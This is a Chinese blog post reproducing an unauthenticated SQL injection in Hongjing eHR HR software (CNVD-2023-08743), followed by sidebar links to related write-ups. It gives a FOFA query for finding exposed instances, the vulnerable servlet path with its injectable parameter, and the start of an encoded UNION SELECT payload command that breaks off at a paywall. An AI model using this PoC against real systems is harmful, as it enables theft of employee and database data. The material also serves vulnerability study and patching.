宏景eHR SQL注入漏洞复现(CNVD-2023-08743)

最新推荐文章于 2024-03-30 00:45:00 发布
最新推荐文章于 2024-03-30 00:45:00 发布
阅读量4.7k 收藏 8
点赞数 6
分类专栏: 漏洞复现 文章标签: 数据库 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/130944159
版权

0x01 产品简介

      宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

0x02 漏洞概述

      宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

0x03 影响范围

  宏景eHR < 8.2

0x04 复现环境

FOFA:body='<div class="hj-hy-all-one-logo"'

0x05 漏洞复现

PoC(注入点是categories字段)

/servlet/codesettree?categories=[加密后的恶意sql]&codesetid=1&flag=c&parentid=-1&status=1

注:这里需要对hrms中的sql语句进行编码 

工具地址:https://github.com/vaycore/HrmsTool

java -jar HrmsTool.jar -e "1' union all select 'hongjing',&
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论
专栏目录
订阅专栏
漏洞复现宏景ehr-hcm-loadhistroyorgtree-sql注入
知黑而守白
01-09 351
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在于宏景EHR人力资源管理系统的 loadhistroyorgtree 接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
宏景eHR 任意文件上传漏洞复现(0day)
0xSec
07-24 4308
宏景eHR OfficeServer.jsp接口处存在任意文件上传漏洞,未经过身份认证的远程攻击者可利用此漏洞上传任意文件,最终可导致服务器失陷。
宏景eHR downlawbase SQL注入漏洞复现
最新发布
qq_36334672的博客
03-30 238
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。面向复杂单组织或多组织客户,支持流程,B/S架构。特别适合集团化管理和跨地域使用的产品,融合了最新的互联网技术和先进的人力资源管理理念和实践,更好地支持异地办公和网上流程,加强了人力资源业务的集中管理和协同,支持集团管控、目标管理、领导决策等应用。
漏洞复现CNVD-2023-08743
zkaqlaoniao的博客
11-01 214
title=”人力资源信息管理系统”
WuThreat身份安全云-TVD每日漏洞情报-2023-05-12
wuthreat无胁科技的博客
05-15 417
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-2645。漏洞编号:CVE-2023-2598。
【1day】复现宏景eHR存在任意文件上传漏洞
记录并分享学习安全的知识点..
07-31 848
北京宏景世纪软件股份有限公司(简称“宏景软件”)自成立以来始终专注于国有企事业单位人力与人才管理数智化(数字化、智能化)产品的研发和应用推广,是中国国有企事业单位人力与人才管理数智化的领航者。 宏景eHR存在任意文件上传漏洞,可经过身份认证的远程攻击者可利用此漏洞上传任意文件,最终可导致服务器失陷。
2023-0Day(漏洞检测Tools)HW-漏洞挖掘-src
qq1140037586的博客
08-23 1301
为更好帮助师傅们日常安全巡检期间及攻防演练期间进行安全自查检测,编写了2023公开漏洞的检测工具。
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
宏景eHR数据字典
08-26
宏景eHR数据字典,
2023-0Day(漏洞检测Tools)V1.6 HW-漏洞挖掘-src
08-23
17、畅捷通Plus_ajaxpro命令执行 18、用友NC/Cloud bsh_servlet_BshServlet命令执行 ...34、宏景HCM_SQL注入 35、华天动力OA未授权访问及SQL注入 36、致远OA_Ajaxdo_upload 37、亿赛通电子文档安全管理系统命令执行
ehr-extraction
03-17
ehr-extraction
宏景eHR知识型企业管理策略.doc
11-29
宏景eHR知识型企业管理策略.doc
宏景eHR app_check_in/get_org_tree.jsp SQL注入漏洞复现
0xSec
12-15 954
宏景eHR app_check_in/get_org_tree.jsp接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
复现宏景HCM 任意文件读取漏洞_63
fushuang333的博客
03-03 838
复现宏景HCM 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
宏景eHR SQL 注入漏洞复现(CVE-2023-6655)
0xSec
12-11 1184
宏景eHR 中发现了一种被分类为关键的漏洞,该漏洞影响了Login Interface组件中/w_selfservice/oauthservlet/%2e../.%2e/general/inform/org/loadhistroyorgtree文件的某个未知功能。通过操纵参数parentid可能导致SQL注入攻击,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
宏景eHR FrCodeAddTreeServlet SQL注入漏洞
weixin_52204925的博客
01-28 616
宏景eHR FrCodeAddTreeServlet SQL注入漏洞
宏景HCM人力资源信息管理系统fieldsettree接口SQL注入
weixin_43567873的博客
03-05 74
宏景HCM人力资源信息管理系统fieldsettree接口SQL注入
【1day】复现宏景OA KhFieldTree接口 SQL注入漏洞
记录并分享学习安全的知识点..
10-17 415
宏景OA是一款基于云计算和SaaS模式的企业级办公自动化软件,它为企业提供了全面的办公自动化解决方案,包括协同办公、流程管理、文档管理、知识管理、人力资源管理、客户关系管理等多个模块。它可以帮助企业提高工作效率、降低成本、提高管理水平和企业形象。宏景OA KhFieldTree接口存在 SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。 ​
宏景ehr 任意文件上传
08-13
宏景ehr存在任意文件上传漏洞。任意文件上传是指攻击者可以通过该漏洞将任意文件上传至服务器中,可能导致安全风险,例如恶意文件的传播或执行,以及系统的受损。 宏景ehr系统中的任意文件上传漏洞可以由以下原因引起:缺乏对上传文件的有效限制和过滤,或是存在未授权的文件上传接口。 攻击者可以通过利用该漏洞上传恶意文件,例如木马、恶意脚本或病毒,来实施攻击。这些恶意文件可以被用于进一步攻击服务器或窃取用户信息。例如,攻击者可以上传受感染的文件并通过执行该文件来获取系统权限,从而访问或篡改敏感数据。 为了预防宏景ehr的任意文件上传漏洞,以下措施可以提高系统的安全性: 1. 实施文件类型的检查与限制:仅允许上传可信的文件类型,例如只允许上传文档、图像或压缩文件,而不允许上传可执行文件等危险文件类型。 2. 文件内容的过滤与验证:对上传的文件进行内容检查与验证,确保其不包含任何恶意代码或脚本。 3. 对上传文件进行病毒扫描:通过病毒扫描软件对上传的文件进行检查,防止上传恶意软件。 4. 限制上传的文件大小:通过限制上传文件的大小,避免攻击者利用大文件来耗尽服务器资源或导致系统崩溃。 5. 强化身份验证与访问控制:考虑使用强密码策略、多因素身份验证以及适当的权限管理机制,确保只有授权用户可以上传文件。 6. 定期更新与维护系统:及时应用安全补丁和更新,以修复可能存在的漏洞。 综上所述,为了避免宏景ehr系统的任意文件上传漏洞带来的安全风险,需要实施有效的文件上传限制与过滤措施,并保持系统的安全性更新。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值